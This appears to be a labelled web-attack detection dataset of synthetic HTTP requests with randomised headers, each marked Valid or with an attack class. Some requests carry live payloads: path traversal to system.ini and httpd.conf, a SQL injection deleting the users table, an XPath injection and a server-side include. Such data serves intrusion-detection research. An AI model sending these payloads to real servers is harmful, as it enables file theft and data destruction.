Upgrade: 7cee/2.2, ualbe/7.8, jivnu/6.0
Warning: 606 52.100.211.135:90 "hAZtmxEys8eovreaorle" 
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 21059
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nCwevb1Anha=a5ts&tenssu=61&nrhiLtcer72e=lqtlocation2 &aisayf2sremnmt=Cm&ppthegn2=deiupdatenor

End - Id: 5123
Start - Id: 45871
class: PathTransversal
GET /n6/sm/eatem2cbt0/rgu6BAh-0.bKl.Tty/ge/4oXT_hjecJoJ4a/N5hyia/5rl/hK8eg-J/tF1KFArY3@O8tO.html?ndm4Esh=%264%3Cst&HlbIPe=8oeeDblWas&reshaOesietezd=een%3D9nevaly&O2hPN=duXdk%4026TlEA&Oteg=%5CWINDOWS%5Csystem.ini&9metaCC=roO&ePenuncebei=jebDra HTTP/1.1
Host: www.Su1msiezuc.cz:80
Connection: close
Accept: text/*;q=0.4
Accept-Charset: shift_jis, windows-1254, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=796
Client-ip: 250.9.181.66
Cookie: asikot5=8858432;dreveasTtnin5z6=sstoee+rldgpdy-ipea;a8nesm2hWtt=36154640
Cookie2: $Version="18"
Date: Sun, 27 May 07 23:19:44 UTC
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: ofnyan@esdcimRn.ch
If-Modified-Since: Sat, 10 Apr 04 19:36:11 CET
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Jul 06 21:48:13 UTC
Max-Forwards: 587
MIME-Version: 5.3
Pragma: hulinc8='tas2c6e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: dsteL 9EurCSnS=ceaotr
Range: 81947-,357703-
Referer: /evaJh/tpxdnph/aiorn.swf
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: 1a0sugok/0.5.2
UA-CPU: StrongARM
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: FTP/5.1 www.t4wqkngc.gif, 2.2 189.183.98.129, 2.9 67.15.176.169
Transfer-Encoding: nerloe; tskaOnc=tsqll
Upgrade: impc/6.7
Warning: 209 www.wjhne.tiff "stswcrstn8elCtryIma" "Tue, 05 Jan 10 17:19:37 GMT"
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 61308570883843
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45871
Start - Id: 3075
class: Valid
GET /cim-mFQDHOS_mKyEU6YG.js?wrdEnnlyafNmt=3006952&6gYB-WlBcX=6mhiih9ahn HTTP/1.0
Host: 100.147.192.187:90980
Connection: mqat
Accept: */*
Accept-Charset: macintosh;q=0.6, cp-932;q=0.7, windows-1257, windows-1257;q=0.9, euc-tw;q=0.0
Accept-Encoding: *
Accept-Language: i0tyds-urr;q=0.6, Anya8-essgYA, O7-e2wr;q=0.9, hlto6te-x;q=0.7
Cache-Control: no-transform
Client-ip: 64.11.119.67
Cookie: 9replaceexec5_5connectqtz=it4Vkl
Cookie2: $Version="6"
Date: Sun, 23 May 04 22:56:19 CET
ETag: W/"Nnkpws8LR1nGn7geN8hU"
Expect: az4ds
From: ssmefI@deee3y.biz
If-Modified-Since: Tue, 18 Aug 09 19:50:37 GMT
If-Unmodified-Since: Thu, 17 May 07 23:40:51 GMT
If-Match: *
If-None-Match: *
If-Range: "HfmH47NKUGeofJPU"
Max-Forwards: 2
MIME-Version: 8.9
Pragma: 3r=t
Proxy-Authorization: inwn hvne4tt=Gseae
Authorization: fdsit Itdz=itHxpvS
Range: -3953,-5
Referer: http://www.eu1k.be/rhaGoinm/nn4e9h.rar
TE: gzip;q=0.4,chunked;q=0.0
Trailer: Trailer
User-Agent: twtultarixBltnksnh3t
UA-CPU: Sparc
UA-Disp: 3985,330,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9081x8193
Via: 2.3 126.40.68.232, FTP/2.6 www.ayar.css:17317
Transfer-Encoding: gzip
Upgrade: ket/3.8, j3t/3.2
Warning: 187 43.192.80.46 "lhthnlt" 
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3075
Start - Id: 42053
class: SqlInjection
GET /fchildE6LeWG2s7Xa/rdunltHs/a6dOV5/aVN1L.YP2dDB/ejITC1GvmrgkU3w2I/tIP/TNiframeyOscript5rBnusrperlOt/xK66RWhTLduqPjHAU/iXd-g5S.asp?oowtD8aea=erso%29&elcame8erw7nbsN=9352026&5i5gt=687666466&rdJsp1c=%27+%29%3B+delete++++from++++users%3B++++commit%3B++dummy%28++++%27&mendh77i5rr=e%40ttr&dCljnrl2EtNta=hvUfe1&E2ttnklEYzil=att&idtb=7zcixdh4o&127=iwyL&lidjatb=lnhAsm0Epcmw&80pnjbfuar4neh=Nstyle HTTP/1.0
Host: www.rgnoe8AtD.it
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, identity;q=0.4, identity, gzip, deflate
Accept-Language: z-rohe, the-t;q=0.9, EricsF-OuwnoFEa
Cache-Control: no-transform
Client-ip: 240.50.140.120
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Fri, 03 Nov 06 18:11:54 UTC
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sun, 21 Aug 05 19:29:33 UTC
If-Unmodified-Since: Sun, 24 Jan 10 12:27:10 CET
If-Match: "2.1tjLpRQmTbkolUBX"
If-None-Match: *
If-Range: *
Max-Forwards: 340
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RXRsdmNVTDpzaXB0
Range: -256
Referer: http://www.Nmonanw.org/cdhe/tderdai/lIumetsu/sntmr/inrn.asmx
TE: gzip;q=0.2
Trailer: Pragma
User-Agent: u20aeI4te4 (gdY-hY; alDO1W3Q; dbEm_k; 3j-rAl8; fMk1nRCjG)
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 307x472
Via: 7ee/6.1 196.216.120.158, FTP/0.0 www.1tmhapa.html, 6.7 163.28.121.133:7083
Transfer-Encoding: hh8e
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42053
Start - Id: 33001
class: Valid
POST /tITZn/al-y/dropchildu2P02RLUAlLs/E2KaKB@_/1bQM/s2nOekeaee/9vhf94Tisf1lSSDT2v.shtml? HTTP/1.1
Content-Length: 80
Content-Language: nuTAlou,gln,l3ofg
Content-Encoding: identity
Content-Location: /wkheaMe1/aDePa/dm6eastr/Tfohtoh.php3
Content-MD5: OEVzc2huc0VtRXRleG5naA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 May 10 13:29:49 UTC
Last-Modified: Fri, 14 Jul 06 04:27:36 GMT
Host: 252.57.230.244:0123
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip;q=0.0, identity
Accept-Language: *;q=0.3
Cache-Control: max-age=71496
Client-ip: 64.219.84.148
Cookie: xtermlsQMNX=pe1oa~EHbnerh ;oiarwzdtrn=1785;noy=t96smlgtEgtix
Cookie2: $Version="09"
Date: Wed, 23 Jun 04 04:39:58 CET
ETag: W/"01aqMSw7Vx@CbRYaUY-"
Expect: lea4e
From: eeo4emN@ig0loe4s.de
If-Modified-Since: Thu, 18 Aug 05 10:09:22 UTC
If-Unmodified-Since: Mon, 23 Feb 04 06:34:20 UTC
If-Match: "BB.9RzU1-vI8Lh.U5id"
If-None-Match: "mj5@DLYgUszMGtwYXaM6"
If-Range: Mon, 09 Feb 04 18:47:31 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: estoht teike8=omovii
Range: 7-,6-
Referer: /3eBunhhp.jsp
TE: trailers,chunked,deflate
Trailer: Proxy-Authorization
User-Agent: aotrhfha (aKaBzg)
UA-CPU: MIPS
UA-Disp: 0209,118,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0187x7765
Via: HTTP/3.8 156.198.4.15, nCt/8.8 www.rkTudnu.shtml
Transfer-Encoding: deflate
Upgrade: naE/8.5, xao/0.4
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 348438564495
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

od=eIjc2@VJp&cV91L=5&ah5n6iihetfat=2E%urse h&AEao04connect=Rqnt1dnyracseseer

End - Id: 33001
Start - Id: 21211
class: Valid
GET /binnull/Nithletiok/aTin1reSb2odqoe/ivbaCP4lnIWU/ehteIiz9oTykEs/weht41v1d1e319y8ta.css?iur5=heewp- HTTP/1.0
Host: www.ktdrm.net:80
Connection: close
Accept: video/mpeg;q=0.3, text/html
Accept-Charset: euc-jp;q=0.6, koi8-r;q=0.1, iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 161.153.118.75
Cookie: ipeacou=hdsu0;eBgrxt4Wfht=cmame9utc6ri
Cookie2: $Version="099"
Date: Wed, 21 Jun 06 01:02:45 CET
ETag: W/"w1rguXxoUb-3_9bgjfC"
Expect: 100-continue
From: ctgd4q@esrdhYOn.net
If-Modified-Since: Mon, 18 Jan 10 09:14:46 GMT
If-Unmodified-Since: Wed, 03 Feb 10 05:00:16 GMT
If-Match: *
If-None-Match: "DtwXgHOQQkkN5YNzxV3"
If-Range: Sat, 27 Aug 05 20:14:31 GMT
Max-Forwards: 4980
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic anIxZW1zOnRsNVZ0b0k=
Authorization: Basic MkFua2VPOmh1SXRnRWw=
Range: 30-5,-6028
Referer: http://psiter.de/ttgh.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/0.7 (X11; U; Open BSD i386 1.1; ta-br; rv:1.1.9) Gecko/14325112
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: HTTP/8.4 2.140.71.122:4712, 8.5 192.33.172.98
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 210.232.150.36
X-Serial-Number: 000063764579
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21211
Start - Id: 14624
class: Valid
GET /fRn2tla/lz6d8n7uI/i3nrtti/asefmcdqc1RG.RUW.exe?h3aa3NsqtidOakt=wl2&sU2oiy=iridk&Tv6oJ@l=482527&Ireon3i=otaccess_log+l%3Ecprocessing-instructionreplace&ct6auwoi3vg=tyaaeleahsdem HTTP/1.1
Host: 199.97.140.243
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, windows-1257;q=0.9, x-mac-cyrillic;q=0.1, koi8-r
Accept-Encoding: *
Accept-Language: iarniv-hr;q=0.7, e-i;q=0.8, nso6NosS-lK9woge
Cache-Control: no-cache
Client-ip: 3.97.160.94
Cookie: M32Drnau=oiyni;cAesyhfjvs=dx1zO;Rdohed=881;nrxdryace1rea=rinsert3ov1wr;dhsAh1wnrsitgtl=)pUnetcattEroj
Cookie2: $Version="53"
Date: Tue, 01 May 07 05:46:27 GMT
ETag: W/"bSZN.hzV37mupqiLdQN"
Expect: 100-continue
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 18 Feb 04 22:35:55 GMT
If-Unmodified-Since: Mon, 27 Aug 07 16:36:23 GMT
If-Match: "7N.4FDRIECfP8dUmO-Qs"
If-None-Match: "gUaVUPa_kwbU5hsiC0L"
If-Range: Sat, 13 Dec 08 02:27:13 CET
Max-Forwards: 32
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM dDNuMHR1dGNnaHNsaHR1bmhtbm5vYWVlb2htcnRwdG51ZXllZXBkYXNvNHRvcg==
Authorization: Digest response="F0dDECF2C5cd78b6a5385FBc9fcE54aF"
Range: 014236-,328751-67,-519123
Referer: /ainnfhCr/oflE/ksi0ne.avi
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: nltvs/7.5.3.7
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2347x669
Via: 0.9 www.qnipL.htm
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 729 222.217.184.32 "Seioo3tr0ha" "Sun, 22 Jul 07 15:10:27 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14624
Start - Id: 12213
class: Valid
GET /Sahnpsac/tvfooeIe7dleeSNEet/e1v/5BnO3s2etdtaer9d2r/8srahmatnhaajT8d/r4D/tt_ghNARtDX2UD/rMwDigaa7l/leordentsxaephsoimt8/ouqixNgXw/WhDdRw9U1O0t667.cgi?t5tm=7077612&4ees3h=tefnnhwetlnsigtl&C@aps=binaNi&hova=7837995&d5aUgo3mofftsrj=tbt&56oe19oh=695744140&@avH=oersWsel5th&usn0ao=jtt%3DbfaahTwjamt&of8t1mt3ethao=5vaoeuiHyxtpbhniy HTTP/1.1
Host: 242.226.197.126:80
Connection: close
Accept: */*
Accept-Charset: windows-1255, x-mac-arabic, cp-950;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: ssgc-wdit, rm6eteh-ewnfqnwm;q=0.6, nr-aegmaeae
Cache-Control: max-age=31977
Client-ip: 230.191.179.120
Cookie: co=qrurToa;ooartiynisOq=550591;le3ara=szo;Dih5awntcrqj8=da=r;Cp3Sz6neeonn=999643;ifoveitiXtk=sc
Cookie2: $Version="000"
Date: Fri, 21 Dec 07 08:24:25 CET
ETag: W/"KHqEuwiKZSr65gOlSy9z"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Sat, 16 Jun 07 14:55:58 GMT
If-Unmodified-Since: Fri, 24 Dec 04 03:49:43 UTC
If-Match: *
If-None-Match: "Is9xVaSQuJX_uo_H"
If-Range: Sat, 27 Oct 07 20:47:27 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: tgrrea=mmpq4
Proxy-Authorization: whuq neane=nte9e
Authorization: qollsc TgairLl=riqec
Range: 979-59,-86,99671-
Referer: /qtbodse0/cucr/Rcnshasl/dmthan.cgi
TE: trailers,chunked
Trailer: Expect
User-Agent: tr0tt/0.7
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 5.7 88.72.225.76
Transfer-Encoding: identity
Upgrade: ahtmp/9.8, tynye/2.5
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 28.18.79.109
X-Serial-Number: 411227
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12213
Start - Id: 49453
class: XPathInjection
GET /dnIhn29Kkg3q/eRBS9hfzRk/n-Na2Jois/tsbH@ei.dll?BUJJ@ok=isoq&xH=0572&rtaswhAft=17835&6kleirre0k1ha=nltgelp&gy2Io5hr8=%28i++%3C++count%28ih%2Fchild%3A%3Atext%28%29%29++++and+++j+++++%3C++++count%28he%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++%3C+++count%28tnE%2Fchild%3A%3A*%29+%29&jmHwW0lperlqBcg=dwindow.openti&OT5bnrcpGcW=yfr+nridioIR%24nawexecnP&Icziai4c=iusdlnNaeamo+k&bitttryHaun=mnLrhhsThpNea&etHswr2nce=5 HTTP/1.1
Host: www.5alt.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 241.130.105.59
Cookie: eandn=2
Cookie2: $Version="082"
Date: Thu, 23 Mar 06 24:28:24 GMT
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 10 Jan 10 12:48:37 GMT
If-Unmodified-Since: Tue, 14 Dec 04 09:59:42 UTC
If-Match: *
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 078
MIME-Version: 3.2
Pragma: m='Btoaece'
Proxy-Authorization: htefu trde6=iidO
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -39079,-78,5246-2810
Referer: /nzoian/eilos/ejuyo/dlodeih/tcnsn.png
TE: deflate,gzip,trailers
Trailer: Accept-Charset
User-Agent: oNdza8 http://www.H7tHenln.it
UA-CPU: Sparc
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 546x4698
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: deflate
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49453
Start - Id: 14742
class: Valid
GET /o.y-E_Nc7gyqP/oli0Etlufkm4lsgfe/actjf-rIXPkF4/lg8.LxCtUamEBNPhWKh7/rGI/h8e.jgSEVBPmbO.gif? HTTP/1.0
Host: www.r1tyzUJS8f.com
Connection: close
Accept: video/quicktime, application/*;q=0.2, text/xml;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: compress, compress, compress, compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=2149
Client-ip: 149.211.102.91
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="8"
Date: Mon, 28 Sep 09 16:31:58 CET
ETag: W/"vtXpvnOSMRy_3ihtR"
Expect: 100-continue
From: 2fha@Uyuktyytdj.de
If-Modified-Since: Sat, 20 Sep 08 14:51:36 UTC
If-Unmodified-Since: Wed, 31 May 06 12:57:52 CET
If-Match: "-c3E.8rdvdOsfZ1pz"
If-None-Match: "HHI_4w_-W6jRhW1mvCe2"
If-Range: Wed, 02 Apr 08 22:42:02 GMT
Max-Forwards: 5
MIME-Version: 4.5
Pragma: e64te=Tsrhtea
Proxy-Authorization: Digest algorithm=MD5
Authorization: ecdera llRF=emprTr
Range: 444847-,76-,3-393
Referer: /25tnn.bin
TE: chunked;q=0.5,gzip;q=0.4
Trailer: Accept
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 9.8; Q9-ia; rv:8.0.7) Gecko/09354573
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1248x2153
Via: 9.3 www.rartts2.css, FTP/0.0 www.r1gnoer.htm
Transfer-Encoding: gzip
Upgrade: soe9td/9.1, sezN/9.4, ep6a/2.0
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 33725360786498
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14742
Start - Id: 6633
class: Valid
PUT /9bttdvw9erm4nEfagxo/hK5vmnCjnYCd_G.jsp? HTTP/1.1
Content-Length: 112
Content-Language: aboens,eru
Content-Encoding: gzip
Content-Location: http://eteNs.de/ublpis2y.conf
Content-MD5: bHV0YWFvYWllbXdlZGUzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 03:00:58 GMT
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: www.eoHtdp.org
Connection: gnsnwta2
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.1, deflate;q=0.7, identity;q=0.9, deflate
Accept-Language: meadusbe-s0iRsmh;q=0.7, ooroasni-mRNIehes, OiIu-pXeah, r-yni, adhwt-e;q=0.8
Cache-Control: max-age=5
Client-ip: 46.201.126.153
Cookie: shha=27157939;xlnmmgTetekllA=ii;oe=a
Cookie2: $Version="882"
Date: Sat, 10 May 08 04:25:22 UTC
ETag: W/"v8_fHdb.7@s.QM@04"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Sun, 21 Jan 07 06:00:38 UTC
If-Unmodified-Since: Wed, 17 Nov 04 24:20:52 CET
If-Match: "iVySfJL6RhjdaESvXK"
If-None-Match: *
If-Range: Mon, 27 Feb 06 04:12:12 UTC
Max-Forwards: 3402
MIME-Version: 0.0
Pragma: as='xreimoed'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest cnonce="eeinnoTd"
Range: -08,-241,7-856
Referer: http://hYre4w.cz/dudr/1saaeP/air5i.js
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/9.5 (X11; U; Open BSD i586 2.3; a8-hg; rv:5.3.1) Gecko/01028915
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: 1.6 32.129.50.31, FTP/7.9 www.r1eNalfb.png:110
Transfer-Encoding: taoze
Upgrade: rvt/4.2
Warning: 001 www.iorone.html "gugtrnnrNyCri0wroi" "Sun, 28 Mar 10 10:39:19 CET"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

0woAAowdbo=cv~1had2eo:am&nh4ednp1zio9hr=2304&rlniysnp=od1O92KUpDLW&cLopen@AFO=56352&yK41H7fitehtHtl=selectsx

End - Id: 6633
Start - Id: 15245
class: Valid
GET /Pn/etyloiansrmtehunsu/Bx3isrm/c4kj.n52ZqDYaA4/P7/g@6MSlnzJQEZ.php3?bnKUuoo9=nexec%2F%40&a8a=rft2services HTTP/1.0
Host: www.cmte.gov
Connection: close
Accept: video/*;q=0.7, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 216.194.155.178
Cookie: fesjyjwelo=we;korSGt=t2irut;passthrufnPRRCUiEf=s;mwMu=zptau2o;6srjjo6=ednwseo
Cookie2: $Version="12"
Date: Sun, 05 Dec 04 15:29:41 UTC
ETag: W/"@PQZwevERhTi5Cop"
Expect: oerylfym=3lcly
From: aecg@hens.de
If-Modified-Since: Tue, 15 Jan 08 17:43:28 CET
If-Unmodified-Since: Sat, 06 Mar 04 20:26:06 UTC
If-Match: "Xlc29gDmIa8Vjyll"
If-None-Match: "cix7pR7M9vofj2ncK"
If-Range: ".41HhOggX9d6U66r"
Max-Forwards: 0
MIME-Version: 9.5
Pragma: eg=srezma
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic ZWxoMTN4ZXI6MmhNeQ==
Range: 32-3322,6622-
Referer: http://leearw.org/dlpa.cgi
TE: deflate,gzip;q=0.4
Trailer: Referer
User-Agent: Mozilla/6.3 (X11; U; Linux i386 2.1; pe-aq; rv:2.9.5) Gecko/93307667
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 175x9558
Via: 6.4 www.uaoi1b.shtml, bynt2/2.6 97.36.181.210
Transfer-Encoding: fGitt
Upgrade: szO45Q/7.7, hf6/5.3
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15245
Start - Id: 36341
class: PathTransversal
GET /vgpstoreeeskviot/copyYidK7JgOXfhtaccesNu/rjm/rl/auodXoDpG23e/iU/0exA/sVaVfKlcbR23h/cyqpmI-is_5gD@J.612.css?7enbo=x89ZTO4TTCea&ooUv7g=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.0
Host: 252.17.226.6:30
Connection: bci4eri
Accept: video/*, image/png, application/*;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.9, hz-gb-2312
Accept-Encoding: *;q=0.1
Accept-Language: wee-etAegvos;q=0.7, rahdoAc-tseAln;q=0.2
Cache-Control: no-cache
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="6"
Date: Mon, 11 Sep 06 06:27:54 UTC
ETag: W/"wczlowywPCBmVlM"
From: emtam@9Sfe.uk
If-Range: *
MIME-Version: 0.4
Pragma: j='sbtemria'
Proxy-Authorization: Digest cnonce="47it"
Referer: /aR4goNh.ace
Trailer: From
User-Agent: lutfd/5.9.5.8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 201x3777
Via: yevfed/6.1 150.195.89.202

null

End - Id: 36341
Start - Id: 39583
class: SSI
GET /hJP.EtrJs3Tad016s/NOmyvAMCnMFJh/e@n6dhErxLQg/llmjjW/nwta4et/UE5v7xO/edQYmM/trrAanknesitmh/xvM-AeKq.C2PM/f-HNG.asmx?s6qolberHQ=%3C%21--++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E HTTP/1.1
Host: www.pihsn.it
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: identity;q=0.3, gzip, compress, compress, gzip
Accept-Language: *;q=0.3
Client-ip: 241.190.56.140
Cookie: od=gotl5epaEhiries9i;egtohsT3haet=Tfeutertge6touconnectc;fihhgoev= nsD;ianeetga=4021668
Cookie2: $Version="759"
Date: Thu, 07 May 09 19:39:49 GMT
ETag: "QQaFNHDxvsmJsy85@QP"
If-Modified-Since: Sun, 04 May 08 16:13:38 GMT
If-Unmodified-Since: Fri, 07 Jan 05 14:28:19 GMT
If-Match: *
If-Range: *
Max-Forwards: 225
Pragma: rnnehwl='m0n54'
Authorization: NTLM bW9vZDZyaW9pZW45Ym5oVGV5bzJlcmFlZWdIdXJncm8=
Range: 5591-,251722-40474
Referer: http://www.1fIen.org/hjod/dszN/0mnyni/rtxeE.swf
User-Agent: cpo0tnsaneWhcwokiv
UA-Disp: 779,442,32
Via: mslntd/8.8 232.20.211.46
Transfer-Encoding: identity
Upgrade: oshili/5.5, wen/5.9

null

End - Id: 39583
Start - Id: 27369
class: Valid
GET /sfTevgetceote7rwf/ceQneoiwtozm/rXBYGD8P/elH8F.jpg? HTTP/1.0
Host: www.okyqmett.ch
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 131.181.78.228
Cookie: e2tq0egageLu=xtermuda<;yrpah5a5eddFo=9+4sircpfet1'ws2;ilemeeemh=syibi9tYRa-ei2n
Cookie2: $Version="9"
Date: Wed, 13 Jun 07 03:25:22 GMT
ETag: "DmP6bpDpq88PUdj@T"
Expect: nMjanasa=eiwmhE7r
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: *
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: Thu, 21 May 09 17:52:02 GMT
Max-Forwards: 8022
MIME-Version: 6.5
Pragma: iShh4oaw=che
Proxy-Authorization: MeYm toondn=clnamd
Authorization: lr3ld mLef=athsiaxc
Range: 5279-
Referer: /5yenm1g.wav
TE: gzip
Trailer: Expect
User-Agent: 1ueti2gujxa8aeds
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9698x542
Via: HTTP/7.9 207.250.52.14
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 365 216.84.39.69 "lisohq8cHaNasanTe" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27369
Start - Id: 11352
class: Valid
GET /ene.nsf?pm_yNCrX8m=oiywotmic&e7tep2bentxqIta=TSedo&XJuYCysG4j=7j.y0F&ahnaetatoh4=080&enilrmgons3L=l7c&tYsduai=+oouo&eqNreet0p4ggnwa=583&1heB9FDd=615866&noth=7xpboLhwLam&obeacIneciewduy=hgWOcqM&ysBAM-qM2u.=aQ%40NuOaf HTTP/1.0
Host: www.nspauderFs.de
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.6, isiri-3342;q=0.8, x-mac-cyrillic;q=0.4, iso-8859-8
